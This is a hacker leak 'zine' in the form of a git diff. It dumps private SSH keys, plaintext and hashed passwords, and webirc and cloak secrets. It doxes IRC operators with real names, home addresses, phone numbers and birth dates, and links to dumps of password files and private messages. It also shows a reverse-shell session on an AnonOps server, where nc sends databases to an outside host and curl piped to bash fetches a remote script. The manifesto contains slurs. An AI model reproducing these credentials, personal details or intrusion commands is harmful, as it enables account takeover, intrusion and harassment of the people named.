MIIDPwIBAAKCAQEA1KnQoLv0drmXUon9nIZUlXhQ7f6iMU0o5xlpbUg0Kwx5cXVB
mhn4gsr4CDk49+fYr29tuHn0NycY2lwuaMUV2yP15Pd05Wx/jgYgKTdaqZaZaIPX
OXbGAdFz3cd13g5pTAwDLblNp6gI4PlcXO/adN1ywOyLzVCmPHcBZqevPLMcL52v
b2ECeBuXKU5Z9leFoOF9IdkhZXTnsvj/yFLy8ZMpBD5JUyCXTfXw7cZZUko1X5wg
1lN76c+A0JKm0cMq8+NvA8ufRaGL2FXUv3McljrcTaRXMksWG3Z/KxEHsh3UY+pH
iNFESYED0jl4o84P6GLIxr7hlqQxpV0TyhwCiQIVALmyxXXqqqrEa83KyCyz557b
qdaLAoIBAQC3+GjuKabODKLSiRAgngwq88L1OJ45HtXyLIBudHLky0JM/nbUVx4f
coQip4jeLx17cMHK7Q/8gY13O81eQe8+IZ2De94PFL2troDsEW28R+7LOKcvidWp
+y2edoU77+/p2aLBUwmiYxlcmX1+w0iH/U/eMZUjtQJ6rawWFnaykBUazZjFNQdn
ZNusvxa4SKOf9Nx5qyXwSW52gqd1dNnrJFu0C10p3Y6ErllVwp5iUTAPPlOeGFnD
hoeu9FiLMVmJHzmiNDLCr6koBkEv+xQl6aL3DQRC7PymyYitltXTf1bf49kDrMWC
7BWuV3PD2pStnu1APfBALYI4DYplfO8MAoIBAQCRKSygD8aMdX83qgMCM6tphVun
snCtDZXhqLpx70aQvgZWoKYQLzdjdcicdSn9JtiWiUOzeS9A4ee5pizMwQOcbn1R
mnwIJe+36EwvCB1nhcwClGJz1ZFVR3JjMJAWob4LkYKnWPjvbLotjr1nMwCKyYRp
swTW1YZFfmodQkoPwdZ4dNKAyxxbLtWCL//l0WlTuzAfVTV4xxI/+BcfaxwW8O9W
XGj/dQwT8TjSqSUlJ2o5S6NX1tD0CmpfJ6JhcEIhAgcO2D2H15h+SZQCGkTB5Lx6
yI4A1msNuosa2+e8txxkoFZ/zIN2EdSqI5nkybOEpq971I8y1ieYtN0bH1MlAhRm
ovpJJvoWRqPg6WS+lyV49RWzMw==
-----END DSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
MIIEoAIBAAKCAQEA43hMo7RV/7O4jNNzcGLrA2NA7kzA3RkcYnNw/lX2iJd0qR2n
a+GEySa/RtAbRRrxTDRgQ4H4LvrNGttoRIUS6gsMNpC4jxHUhzdYQikedNUNEA81
Ro7qMOULpRy9eoE0kntWIxyi5lpoSKR67KEkfhoChSe3ZEa0HqGumGWvhKJIdNtZ
Rd3GJc9HvzIr5rKxgmw4oQP9AHhhuwHTmVVLpkCI+eL8uemH+Bp8BHGNXZ4RtN50
oFB+09vtTfgCELYtAjZf6LQMCqdu6wLDx6VPxz1L6ukSoU6Oljka7Ktxjd9YR/ZU
dbmORCArArxW606rbLa9vspcWXpWBbNEwyiCXQIBIwKCAQBUfSPHxqOZfUSMFAZO
UKBu+PrcKyMQSyfMy8riH+3a9m0o3yDtjkdDZinJ2ESko5t0E3Q2VNiGemlwYB9p
6EjalmOfPRFZtipeG970AKTpkPY5KjhcCTJp7qyNyNip2DgZJn8UWxfvKOTnyBBm
hP7tAli1HWFfwn1qdpFOjCs/484Gryp0q+WFdrNrPJ1/8zqAUyqJj0cTXv6Pyeyl
RGkFmggFQgjhT/+rlrbqreMaiUMxUT2GjlvDNATrIydQVFyxIuF2El5lTVRWzV0m
rxTLTzxmZkgum+ANEC5pBNqGiTkPa2sCvRC3gtKmaZmFh6bv2/bbFOYCOEyHMfML
tQLPAoGBAPVaMLkmuQW+CUfGb+qCz/pHxDVG0Vj97GFgs1eIoskn5/3CSX9tkkTV
mKHQ3cFiV0QJWyy0MQOCTzC/yHPRj0DrZqsnOVufc1HVIADck1NKBVcXUyhRlbcB
1qW3IXeagr+lmZeVB+8WtM3oD9d8HY+Gvx+4O8ES9Am85kGfuQ8TAoGBAO1XcJBH
fVZ2mhzrvJlaLHwv730i6/hYPXphB3UYq48gfsRkhT4BbDBUiZ7201TbN7ZOHrX4
AqumdtayqYbdCLd0+6SDmAELsrAsMAM0JuvjsWXnR3a+i1T7D4Iay62c13UqFCae
PnIrqK/Qy0SRiNCbRPG4uM2PUS96Wjm1JabPAoGAfi5iM1W+PXetAFdswb+eKPG1
XTpdCTIhy64TFxMR48thXe7j+GQ8mG3Zd8qArJj5rfYu48piWZN5LwOLqUczuvy4
dUdfU7EWvF76hBmq2mCVCDfhn7Tt6Rbjayr7RNMeq7RAXJXJkOcbKBDyNE51mkVM
WXSxBDWiE6L6Ex7xdXcCgYA9B9sdyT18oiehCWsC3Kxacrns+lnvZyXAYhfcSCwd
fWJtA+e/fLVrg3PYa1rp7zo2MVharX0HkTSAWdPSONZbD3PoeZwdhqpKjwUII1p3
K+vJvyEBRvCg0tgaJCW+7dEA3u89IWCDwhVvCc3ebpDlLz2dPiDkZq557EMWJ0Qy
NQKBgFpovHwPC5k1bX9y2Sv7J+YgIiDgELsOxF9UQzWFzb1XCPczUA027RZTgLJX
ILQi0R8af8yCpxN3PUSQXtWwZXZMJZF9puFM2vXRe1Xd3kuZg4BEkoVtB5hYK5oE
yqzQAbROM2rLILM6Bj+zro5IApDQxJ4FokvNfhJm2JzdiSmo
-----END RSA PRIVATE KEY-----
jared () sidewinder netonecom net weJAruSE
http://www.2shared.com/file/-gqbHglO/jared.html (NicE priv8 keyz ;))
trix () sidewinder netonecom net trix4kids
molkmin -> jared: ah, you plan on lettingothers ssh in?
jared -> molkmin: no i thought you did
molkmin -> jared: hell no.
jared -> molkmin: okay well then forget what i said
molkmin -> jared: there are like 5 people that can ssh into sidewinder
molkmin -> jared: or maybe 7
jared -> molkmin: and only 2 of them are convicted felons
molkmin -> jared: I just recently secured SSH
jared -> molkmin: ahh so it won't allow IPs other than ours <<< You use open proxies too?
molkmin -> jared: got hacked..user used an account name of "test" password "test" <<< LOL
jared -> molkmin: grr
:: 0x06 - d0x ::
Axod
Name: Jimmy Moore
Location: Probably out of the UK
NickServ: axod:383cf3a3f7c2
Oper: axod:ce18da2ddae4
Email: jimmy.moore () gmail com
Email2: jimmy () axod net
Email3: axod () axod net
Email4: axodmedia () gmail com
Mugshot: http://a1.twimg.com/profile_images/71426235/Photo_175.jpg
http://bizzy.co.uk/uk/05956691/axod-media
http://twitter.com/#!/mibbit
http://twitter.com/#!/axod
http://digg.com/axod
http://axod.blogspot.com/
Azander
Name: Alanon Zander
Address: 2132 South 29 Rd Cadillac, MI 49601
NickServ: Azander:kikicat
Oper: azander:flagon3
Email: alanonzander () gmail com <<< kikicat
Email2: alanonzander () yahoo com <<< password recovery sends back to gmail LOL
https://plus.google.com/113170461621014873855/posts
http://www.myspace.com/alanonzander
http://user.netonecom.net/~azander/alanon.htm
Havvy
Name: Ryan Havvy
Age: 18?
Address: Somewhere in Washougal, WA
NickServ: Havvy:hmagic
Oper: havvy:hknight
Email: ryan.havvy () gmail com
http://twitter.com/#!/havvy
http://havvy.wordpress.com/
http://www.stumbleupon.com/stumbler/Havvy/
havvy havvy
xkcd.com/936/ Password security explained in a couple panels.
10 Aug ^^^ coming from someone whose passwords are 6 lowercase characters?? hahahah
Hercule
Name: Jürgen Wind
Location: Germany
NickServ: Hercule:herc47
Oper: hercule:0b2ac71dc51f
Email: jwind () gmx de
Joshua
Name: Joshua Luckers
Age: 23
DOB: 06/15/1988
NickServ: Joshua:TwEaKeRs
Oper: joshua:ec31e1a98607
Email: joshua () sensiva net
Mugshot:http://mediacdn.disqus.com/uploads/users/146/1862/avatar92.jpg
http://joshualuckers.nl/
Kitsune
Name: Todd Parker
Email: kitsune () sbcglobal net
NickServ: Kitsune:undquiet
Oper: kitsune:$5T`mIb5705
http://nenolod.net/~nenolod/mibbit-debacle.html
Molkmin
Name: Thomas W Lyon
Age: 58
DOB: 06/04/1953
Address: 2188 US Highway 10 Sears, MI 49679-8073
NickServ: molkmin:sotw1btn
Oper: molkmin:ghotisotwbtn
Email: tlyon () netonecom net
Email2: fxrocker () gmail com
Phone: 231-734-6144
http://www.netonecom.net
http://photobucket.com/home/molkmin <<< molkmin:sotw1btn
http://twitter.com/#!/molkmin <<< molkmin:sotw1btn
Pottsi
Name: Ian Potts
Age: 24
Location: Manchester, UK
NickServ: pottsi:digger
Email: pottsi () pottsi com
Email2: ian1potts () aol com
Email3: iantom90 () hotmail co uk
http://pottsi.com/
http://www.myspace.com/56242380
Sindacious
Name: James Clifton Newton
Age: 19
DOB: 05/06/1992
Address: 1506 Jenks Ave Panama City, FL 32405
Oper: sindacious:284adflgy343
Phone: 785-746-0322, 850-215-2518
Email: admin () SinIRC net
http://sindacio.us/
http://www.sindacious.com (It just redirects to sindacio.us)
http://twitter.com/sindacious
:: 0x07 - exit ::
K1LL Th3 G1b50n!
attachm3nts >>>
n3t0nec0m shad0ws
m1rr0r 1: http://www.mediafire.com/file/mdlc4wibpacevv6/swshadow
m1rr0r 2: http://www.2shared.com/file/Axzg1umn/swshadow.html
w1k1 pass3s
m1rr0r 1: http://www.mediafire.com/?s9c9jtns5tp8oux
m1rr0r 2: http://www.2shared.com/file/pAg2gqyb/mibbitwiki.html
n1cks3rv pass3s
m1rr0r 1: http://www.mediafire.com/?g8hpr34ssu1ssdq
m1rr0r 2: http://www.2shared.com/document/TLTX8j3E/fullnspassdump.html
pMs
m1rr0r 1: http://www.2shared.com/file/Eq3cyC7f/mibbitpms.html
m1rr0r 2: http://tools.mibbit.com/mibbitpms.out :PppPpPPPPppppppp
cHaN msGs
http://www.2shared.com/file/5Kf08Z3-/mibbitchanmsgs.html
root () tools:~# wall <<< "E0F"
Broadcast Message from root () tools
(/dev/pts/3) at [redacted] ...
E0F

816
htp/HTP-3.txt Normal file
View File

@ -0,0 +1,816 @@
888 888 d8888 .d8888b. 888 d8P
888 888 d88888 d88P Y88b 888 d8P
888 888 d88P888 888 888 888 d8P
8888888888 d88P 888 888 888d88K
888 888 d88P 888 888 8888888b
888 888 d88P 888 888 888 888 Y88b
888 888 d8888888888 Y88b d88P 888 Y88b
888 888 d88P 888 "Y8888P" 888 Y88b
_____
8888888888 888 ,-:` \;',`'-
888 888 .'-;_,; ':-;_,'.
888 888 /; '/ , _`.-\
8888888 888 | '`. (` /` ` \`|
888 888 |:. `\`-. \_ / |
888 888 | ( `, .`\ ;'|
888 888 \ | .' `-'/
8888888888 88888888 `. ;/ .'
`'-._____.-'`
8888888b. 888 d8888 888b 888 8888888888 88888888888 d8888
888 Y88b 888 d88888 8888b 888 888 888 d88888
888 888 888 d88P888 88888b 888 888 888 d88P888
888 d88P 888 d88P 888 888Y88b 888 8888888 888 d88P 888
8888888P" 888 d88P 888 888 Y88b888 888 888 d88P 888
888 888 d88P 888 888 Y88888 888 888 d88P 888
888 888 d8888888888 888 Y8888 888 888 d8888888888
888 88888888 d88P 888 888 Y888 8888888888 888 d88P 888
<shitstorm> lol who the fuck is carlos
CARLOS1337
PRESENTE
LOL ANONOPS MUERTO
CERO DIA EDICION
┌─────────────────────────┐
│ :: Table of Contents :: │
├─────────────────────────┤
│ 0x01 ~ Prefac3 │
├─────────────────────────┤
│ 0x02 ~ s3rv1c3s pwn │
├─────────────────────────┤
│ 0x03 ~ iRCd pwn │
├─────────────────────────┤
│ 0x04 ~ b0x pwn │
├─────────────────────────┤
│ 0x05 ~ 1ps │
├─────────────────────────┤
│ 0x06 ~ l0l sh1t │
├─────────────────────────┤
│ 0x07 ~ FiL3z │
├─────────────────────────┤
│ 0x08 ~ ex1t │
└─────────────────────────┘
:: 0x01 - Prefac3 ::
Over the course of the following months, it has become very clear to us that
AnonOps no longer stands for the values of open speech, freedom of opinion and
has instead transformed itself into a network rampent with trolls, abusive
channel operators, and a generally unwelcoming place for those whom wish to
communicate and gather to fight the powers of corruption, and those whom wish
to censor our open internet. Various attempts have been made in the past to
course correct AnonOps, but the totalitarian IRC operator regime has remained
intact.
The AnonOps network prides itself in being "secure", however, such is not
the case. Rather, they employ incompetent and highly unprofessional channel and
IRC operators, allowing their personal grudges to interfere with the operation
of a secure network for Anonymous. Newcomers to the network are welcomed by a
spirit of condescention and arrogance, as any legitimate question or concern is
slowly drowned out by the laughter of the senior members of the chatroom.
Channel operators rather than discourage such behavior, applaud it, joining in,
and using their powers to kick, ban, or SAJOIN newcomers to #kill. Any attempt
to speak out against the way the network is ran is met with kick, ban, or zline.
A decentralized organization such as Anonymous cannot thrive on a network ran by
such people as Power2All, Wolfy, Owen and Shitstorm. Anonymous transcends beyond
one IRC network, or one social medium. Spread. Be aware. Educate. Anonymous is
an idea; ideas are bulletproof.
Anonymous cannot be owned or controlled by a small group of faggot
totaltarian operators. Thus we have decided to lombotomize the cancer that is
AnonOps from the internet. AnonOps no longer stands with Anonymous, but rather
against us as an agent of censorship, unlulzy pseudo-activism and immense
faggotry, and thus must be eliminated.
AnonOps has proven itself insecure and fault prone in the past. We are here
to illustrate these points again. AnonOps is NOT Anonymous, and throughtheir
actions, they have proven themselves against our ideals. Welcome to thecourt of
the internet, AnonOps. You shall be persecuted for your crimes against the
freedom of chats, your utter and repeated failure as an IRC network, your aid to
the spread of namefagging, and your gross negligence in securing the identities
of those whom chat and remain Anonymous on your network.
AnonOps has shown time and time again it is too large of a target, and very
well capable of corrupting the ideals which fuels the fight in every Anon.
As long as AnonOps stay online, they will continue to adulterate our cause,
bastardizing ideals of Anonymous, and running a network where the only lulz to
be had are that of the failures whom chat there and run the network. Such
activity cannot continue.
Let's drop the formalities now, and get down to business!
:: 0x02 - s3rv1c3s pwn ::
¡HOLA! ¡CARLOS1337 AQUI CON UN NUEVO ZINE!
~~~ JAJA ANONOPS ESTOY MUERTO: ¡AY CARAMBA! ¡UNA CERO DIA! ~~~
After probing AnonOps for quite a while, we figured out that they were using
a vulnerable version of Anope IRC Services. With a bit of luck, and an in house
zero day we were able to get ourselves a reverse shell.
connect to [REDACTED] from 46.182.105.86 38604
[anonops@ns1 ~]$ id
uid=502(anonops) gid=502(anonops) groups=502(anonops)
# Let's go ahead and snag ourselves some juicy files...
[anonops@ns1 ~]$ cd ~/inspircd/run/conf
[anonops@ns1 conf]$ nc htp 443 < inspircd.conf
[anonops@ns1 conf]$ cd ~/services
[anonops@ns1 services]$ nc htp 443 < nick.db
[anonops@ns1 services]$ nc htp 443 < chan.db
[anonops@ns1 services]$ nc htp 443 < oper.db
[anonops@ns1 services]$ nc htp 443 < os_info.db
# And then let's go ahead and hook services.
[anonops@ns1 services]$ curl http://secret.hep.cc/lol.sh | bash >/dev/null 2>&1
[anonops@ns1 services]$ killall services; ./services; exit
:: 0x02 - iRCd pwn ::
¡Dios Mios!
<admin name="AnonOps" nick="AnonOps" email="AnonOpsNetwork@gmail.com">
<power hash="sha256"
diepass="62b0ddb2bda9dd3cd239f6ae21c88ef13d2e70d27e0f79fbf88be0f1575ed8fb"
restartpass="ca985667598484ddf516e3b2f445491b4c31e82963422dd07d305bcc4d24ff65">
<connect name="localhost" allow="127.0.0.0/8" timeout="90" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" globalmax="1000" useident="no" limit="5000"
modes="+xiw">
<connect name="vpn" allow="46.236.2.47" timeout="40" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" localmax="10" globalmax="10" useident="no"
modes="+xiw">
<connect name="mibbit1" allow="64.62.228.82" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+xwi">
<connect name="mibbit2" allow="207.192.75.252" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit3" allow="78.129.202.38" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit4" allow="109.169.29.95" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="main" allow="*" timeout="10" pingfreq="120" hardsendq="786432"
softsendq="8192" recvq="8192" threshold="10" commandrate="1000" fakelag="on"
localmax="2" globalmax="3" useident="no" limit="5000" modes="+xiw">
<cidr ipv4clone="32" ipv6clone="128">
<channels users="50" opers="100">
<banlist chan="*" limit="128">
<options prefixquit="Quit: " suffixquit="" prefixpart="" suffixpart=""
fixedquit="" fixedpart="" syntaxhints="no" cyclehosts="no"
cyclehostsfromuser="no" ircumsgprefix="no" announcets="no"
allowmismatched="no" defaultbind="auto" hostintopic="no" pingwarning="15"
serverpingfreq="300" defaultmodes="nt" exemptchanops="NcBS"
invitebypassmodes="no">
<performance netbuffersize="10240" maxwho="20" somaxconn="128" softlimit="1024"
quietbursts="yes" nouserdns="no">
<security announceinvites="dynamic" hideulines="yes" flatlinks="yes"
hidewhois="AnonOps" hidebans="yes" hidekills="Killer" hidesplits="yes"
maxtargets="20" customversion="AnonOpsIRC" operspywhois="yes"
restrictbannedusers="yes" genericoper="yes" userstats="">
<limits maxnick="31" maxchan="31" maxmodes="20" maxident="11" maxquit="100"
maxtopic="307" maxkick="150" maxgecos="30" maxaway="30">
<whowas groupsize="3" maxgroups="5000" maxkeep="3d">
<insane hostmasks="yes" ipmasks="yes" nickmasks="yes" trigger="75">
<badnick nick="ChanServ" reason="Reserved For Services">
<badnick nick="NickServ" reason="Reserved For Services">
<badnick nick="OperServ" reason="Reserved For Services">
<badnick nick="MemoServ" reason="Reserved For Services">
<badnick nick="BotServ" reason="Reserved For Services">
<badnick nick="vHostServ" reason="Reserved For Services">
<badhost host="IRCLOIC@*" reason="wrong server">
<uline server="services.anonops.in" silent="yes">
<uline server="defender.anonops.in" silent="yes">
# Oper Classes
<class name="Root"
commands="DIE RESTART RSQUIT JUMPSERVER LOCKSERV UNLOCKSERV SQUIT
GRELOADMODULE CLEARCACHE">
<class name="Shutdown" commands="REHASH LOADMODULE UNLOADMODULE RELOAD
GLOADMODULE GUNLOADMODULE SQUIT"
privs="users/auspex channels/auspex servers/auspex users/mass-message
channels/high-join-limit channels/set-permanent users/flood/no-throttle
users/flood/increased-buffers" usermodes="*" chanmodes="*">
<class name="ServerLink" commands="CONNECT RCONNECT MKPASSWD ALLTIME SWHOIS
CLOSE TAXONOMY" usermodes="*" chanmodes="*" privs="servers/auspex">
<class name="BanControl" commands="KILL GLINE KLINE ZLINE QLINE ELINE TLINE
RLINE CHECK NICKLOCK NICKUNLOCK SHUN CLONES" privs="channels/auspex
channels/high-join-limit" usermodes="*" chanmodes="*">
<class name="OperChat" commands="WALLOPS GLOBOPS SETIDLE" usermodes="*"
chanmodes="*" privs="users/mass-message">
<class name="HostCloak" commands="SETHOST SETIDENT SETNAME CHGHOST CHGIDENT
CHECK CHGNAME" usermodes="*" chanmodes="*">
<class name="OperUnlag" privs="users/flood/no-throttle
users/flood/increased-buffers">
<class name="ServAdmin" commands="SAMODE SAJOIN SAPART SANICK SAQUIT SATOPIC
OJOIN FILTER CBAN">
# Oper Types
<type name="RootAdmin" classes="Root Shutdown ServerLink BanControl OperChat
HostCloak OperUnlag ServAdmin" vhost="netadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC BANWALK">
<type name="NetAdmin" classes="OperChat BanControl HostCloak Shutdown
ServerLink OperUnlag ServAdmin" vhost="netadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
<type name="GlobalOp" classes="OperChat HostCloak BanControl OperUnlag ServerLink"
vhost="ircop.anonops.in" override="KICK MODEOP MODEDEOP MODEVOICE
MODEDEVOICE MODEHALFOP MODEDEHALFOP">
<type name="Helper" classes="HostCloak" vhost="helper.anonops.in">
<type name="ServicesAdmin" classes="OperChat HostCloak OperUnlag BanControl
ServerLink Shutdown" vhost="servadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
# Oper List
<oper name="power2all" hash="sha256"
password="e6275286066acd1939ee617fd8481903b5de5b3573d00835481db7024f8cc488"
host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="Cody" hash="sha256"
password="1698c6b760f79d808b27dc8d2605acafbbf53cdf78d3603a0883b8df2f483b9f"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pi" hash="sha256"
password="c12c6c10bfe35d2facfede647fb6651ea0074660d17ee3af3bd7831d087d44ce"
host="*@*" vhost="anonops.staff" type="RootAdmin">
<oper name="p0ke" hash="sha256"
password="a214007b665299c451106a9ea16687ec845d9131646de9099521d34065d98ac6"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="jaychow" hash="sha256"
password="2037df642493897250048bb739d3237c11aabb48e4e00dfa9f75dc163bda1742"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="shitstorm" hash="sha256"
password="1eba91646d70e6634e3014a3167c6e0efa3a2809472645711d8306b787322821"
host="*@*" vhost="staff.anonops.li" type="RootAdmin">
#<oper name="Isis" hash="sha256"
# password="61f317d24a98796f28c387c0db5cebe475cd5dcd67963e68fafabc22d79636b7"
# host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="Nerdo" hash="sha256"
# password="7bbc72b57333b8f4dbbab0d88847e2f25d6cd5926876b0fad07db2469151e046"
# host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="evilworks" hash="sha256"
password="8a6d07285f406fb3c894c30545ef9514cd3056b6316dd016e0365c43de7e6b7b"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="Jupiler" hash="sha256"
password="96803102354be6a01acfd47e62eb0eace11fa6aff44e20fc94afe9244f4038a3"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="sharpie" hash="sha256"
# password="24dd9c6aab6e116fbb62f9aa5cba78ccd0b9852c929064e5ae07cebd29a20db7"
# host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="daboogieman" hash="sha256"
password="0e3b8fa38cfae600196897531e5b1b96059c6041b9ad68eec1ba0ed91a1d6027"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pie" hash="sha256"
password="5bc4d814c4ed162f2cea2a40ffb156f2cac198ddf24316a2de6e3614cc892461"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
# Default Modules Configs
<module name="m_md5.so">
<module name="m_sha256.so">
<module name="m_ripemd160.so">
<module name="m_alias.so">
<alias text="NICKSERV" replace="PRIVMSG NickServ :$2-" requires="NickServ"
uline="yes">
<alias text="CHANSERV" replace="PRIVMSG ChanServ :$2-" requires="ChanServ"
uline="yes">
<alias text="OPERSERV" replace="PRIVMSG OperServ :$2-" requires="OperServ"
uline="yes" operonly="yes">
<alias text="BOTSERV" replace="PRIVMSG BotServ :$2-" requires="BotServ"
uline="yes">
<alias text="HOSTSERV" replace="PRIVMSG HostServ :$2-" requires="HostServ"
uline="yes">
<alias text="MEMOSERV" replace="PRIVMSG MemoServ :$2-" requires="MemoServ"
uline="yes">
<alias text="NS" replace="PRIVMSG NickServ :$2-" requires="NickServ" uline="yes">
<alias text="CS" replace="PRIVMSG ChanServ :$2-" requires="ChanServ" uline="yes">
<alias text="OS" replace="PRIVMSG OperServ :$2-" requires="OperServ" uline="yes"
operonly="yes">
<alias text="BS" replace="PRIVMSG BotServ :$2-" requires="BotServ" uline="yes">
<alias text="HS" replace="PRIVMSG HostServ :$2-" requires="HostServ" uline="yes">
<alias text="MS" replace="PRIVMSG MemoServ :$2-" requires="MemoServ" uline="yes">
<alias text="IDENTIFY" replace="PRIVMSG NickServ :IDENTIFY $2" requires="NickServ"
uline="yes">
<module name="m_allowinvite.so">
<module name="m_alltime.so">
<module name="m_auditorium.so">
<auditorium opvisible="no" opcansee="yes" opercansee="yes">
<module name="m_blockcolor.so">
<module name="m_botmode.so">
<module name="m_callerid.so">
<callerid maxaccepts="16" operoverride="yes" tracknick="no" cooldown="120">
<module name="m_chancreate.so">
<module name="m_chanprotect.so">
<chanprotect noservices="no" qprefix="~" aprefix="&amp;" deprotectself="yes"
deprotectothers="yes">
<module name="m_check.so">
<module name="m_chghost.so">
<module name="m_chgident.so">
<module name="m_chgname.so">
<module name="m_cloaking.so">
<cloak mode="full" key="bubrafuKuWazunustFrUvacuvezawrU4rEgu" prefix="AN-">
<module name="m_close.so">
<module name="m_clones.so">
<module name="m_conn_umodes.so">
#<module name="m_connectban.so">
#<connectban threshold="4" duration="10m" ipv4cidr="32" ipv6cidr="128">
<module name="m_dccallow.so">
<dccallow blockchat="yes" length="0" action="block">
<banfile pattern="*" action="block">
<module name="m_delayjoin.so">
<module name="m_devoice.so">
<module name="m_dnsbl.so">
<dnsbl name="DroneBL" type="bitmask" domain="dnsbl.dronebl.org" action="ZLINE"
reason="DroneBL" duration="30d" bitmask="253">
<dnsbl name="ProxyBL" type="bitmask" domain="dnsbl.proxybl.org" action="ZLINE"
reason="ProxyBL" duration="30d" bitmask="253">
<dnsbl name="efnetRBL" type="bitmask" domain="rbl.efnet.org" action="ZLINE"
reason="EFnetRBL" duration="30d" bitmask="253">
<module name="m_filter.so">
<filteropts engine="pcre">
<module name="m_globalload.so">
<module name="m_globops.so">
<module name="m_halfop.so">
<module name="m_hidechans.so">
<hidechans affectsopers="false">
<module name="m_hideoper.so">
<module name="m_inviteexception.so">
<module name="m_joinflood.so">
<module name="m_knock.so">
<module name="m_lockserv.so">
<module name="m_maphide.so">
<module name="m_messageflood.so">
<module name="m_muteban.so">
<module name="m_conn_waitpong.so">
<waitpong sendsnotice="yes" killonbadreply="no">
<module name="m_nickflood.so">
<module name="m_nicklock.so">
<module name="m_nonotice.so">
<module name="m_noctcp.so">
<module name="m_nokicks.so">
<module name="m_nonicks.so">
#Oper modules
<module name="m_operchans.so">
<module name="m_ojoin.so">
<ojoin prefix="" notice="no" op="no">
<module name="m_operjoin.so">
<operjoin channel="#opers" override="no">
<module name="m_opermotd.so">
<opermotd file="oper.motd" onoper="yes">
<module name="m_override.so">
<module name="m_password_hash.so">
<module name="m_redirect.so">
<module name="m_regex_glob.so">
<module name="m_regex_posix.so">
<module name="m_regex_pcre.so">
<module name="m_regonlycreate.so">
<module name="m_rline.so">
<module name="m_sajoin.so">
<module name="m_sakick.so">
<module name="m_samode.so">
<module name="m_sanick.so">
<module name="m_sapart.so">
<module name="m_satopic.so">
<module name="m_securelist.so">
<securehost exception="*@*.searchirc.org">
<securehost exception="*@*.netsplit.de">
<securehost exception="*@bot.search.mibbit.com">
<module name="m_sethost.so">
<module name="m_setident.so">
<module name="m_setname.so">
<module name="m_seenicks.so">
<module name="m_services_account.so">
<module name="m_showwhois.so">
<module name="m_shun.so">
<shun enabledcommands="PING PONG QUIT PART" notifyuser="no" affectopers="no">
<module name="m_spanningtree.so">
<module name="m_sslmodes.so">
<module name="m_ssl_gnutls.so">
<module name="m_sslinfo.so">
<module name="m_stripcolor.so">
<module name="m_svshold.so">
<module name="m_swhois.so">
<module name="m_timedbans.so">
<module name="m_tline.so">
#<module name="m_xline_db.so">
#Mibbit Blocks
<module name="m_cgiirc.so">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="64.62.228.82">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="207.192.75.252">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="78.129.202.38">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="109.169.29.95">
# P0ke's WebIRC
<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="127.0.0.1">
:: 0x04 - b0x pwn ::
[anonops@ns1 run]$ base64 utmp
[anonops@ns1 etc]$ cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
